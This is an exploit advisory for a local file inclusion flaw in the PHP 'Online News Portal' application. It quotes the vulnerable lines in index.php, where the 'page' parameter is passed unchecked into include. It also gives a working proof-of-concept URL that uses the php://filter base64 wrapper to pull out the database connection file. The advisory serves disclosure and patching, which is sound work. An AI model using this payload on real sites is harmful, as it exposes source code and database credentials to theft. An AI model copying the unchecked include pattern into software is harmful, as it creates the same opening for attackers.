# Exploit Title: Online News Portal  - Local File Inclusion
# Date: 2020-11-16
# Exploit Author: gh1mau 
# Email: gh1mau.rulez@gmail.com
# Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14600&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code
# Software Release Data: November 16, 2020
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)

Vulnerable File:
---------------- 
/index.php

Vulnerable Code:
-----------------
Entry point:
line 26: $page = isset($_GET['page']) ? $_GET['page'] : 'home';

Exit point:
line 27: include $page.'.php';

Vulnerable Issue:
-----------------
Attacker could load and read any file from the application (page= parameter from index.php) (with .php extension) and decode the base64 response to read the source code.

POC:
----
http://localhost/news_portal/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect